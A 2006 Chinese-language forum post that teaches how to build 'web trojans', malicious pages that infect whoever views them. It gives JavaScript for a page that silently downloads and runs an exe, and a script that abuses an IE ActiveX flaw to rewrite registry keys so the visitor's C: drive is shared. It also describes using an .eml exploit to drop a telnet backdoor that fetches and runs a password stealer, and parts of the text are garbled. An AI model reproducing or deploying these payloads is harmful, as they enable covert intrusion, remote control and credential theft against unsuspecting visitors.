查看單個文章
舊 2006-04-22, 07:13 PM   #4 (permalink)
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

網頁木馬
大家對木馬都不陌生了,它可能要算是電腦病毒史上最厲害的了,相信會使木馬的人千千萬萬,但是有很多人苦於怎麼把木馬發給對方,現在隨著電腦的普及,在網路上我相信很少有人會再輕易的接收對方的文件了,所以網頁木馬誕生了。
1.它應該算是html帶動同路徑下的一個exe的文件的主頁了,也就是當瀏覽器瀏覽這個頁面的時候,一個exe的文件就在後台自動下載並執行了,可以做一個test.html的文件在桌面,內容如下:
<script language="javascript">
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"test.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1>網頁載入中,請稍後....</H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
再在桌面下隨便找個exe的文件,名字一定要改為tset.exe,好了,這時候雙按我們剛才產生的html文件,當看到「網頁載入中,請稍後....」的時候,我們的那個同路徑下的exe文件也被無條件執行了,這種頁面的優點就是編譯修改簡單,但是!當你申請下了一個個人主頁空間的時候,把這兩個文件上傳上去的時候,當你試圖通過瀏覽器瀏覽你的傑作的時候,ie的安全警告跳了出來,我想沒有幾個人願意乖乖的冒著風險去點「是」,好了,儘管這個網頁木馬在本機是多麼的完美,但是放到了網上就通不過ie的安全原則了,這個小馬失敗了。
2.是通過ie自身的漏洞寫入註冊表,相信很多人經常在瀏覽一些主頁的時候,註冊表被改的亂七八糟、ie標題被改、首頁被改、註冊表編輯器被禁用等等,這些都是自動修改了你的註冊表的網頁的傑作,所以我門也可以做個頁面讓瀏覽者的硬碟完全共享,也是做個html的文件,內容如下:
script language=javascript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000);
}

init();
</script>
當對方的瀏覽過這個頁面的時候,他的c:就被共享了,共享後的進入方法嘛..哈哈不用說了吧,但是他雖然被共巷了,但是你還不知道誰正在看你的這個頁面,他的ip又是多少你都不知道,沒有關係,有個很簡單的方法,去163申請一個域名的轉換,如:http://www.jdxh.com連接目標位址裡...褪槍蠶砹{恿恕?/a>
這種網頁木馬的特點是比較安全,不宜被對方發現,但是使用麻煩需要牽扯到很多的東西。

3.也是現在最好用的一種了吧,個人認為。它是將一個小巧的exe文件作成一個.eml的文件,再用ie的漏洞讓一個html的頁面執行這個.eml的文件,你的那個小巧的exe文件就被執行了,由於程式碼過長又因每個exe文件轉換後的程式碼不同所以不可能一一寫出,下面指出一個位址http://www.jdxh.com實際上就是一個轉...憧梢醞&uuml;齮elnet x.x.x.x 3385來完全控制對方(這個5k的小後門是winshell5.0黑白網路有下,同時這個winshell5.0還有一個很出色的功能,就是能下載一個你事先設定好的指定路徑下的一個文件,並執行他,我放置的是網路深偷,如果你的殺毒軟體夠厲害的話,神偷是可以被查出來的,這裡只是實驗,實際中可以指定很多查不到的小馬,這裡不闡述),有興趣的朋友可以來試試。
這種網頁木馬的特點是,對方挨種率較高,除了製作麻煩一點外,沒有什麼缺點啦
好了所有的漏洞都是建立在系統漏洞的前提下,多昇級多打修正檔沒有壞處
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次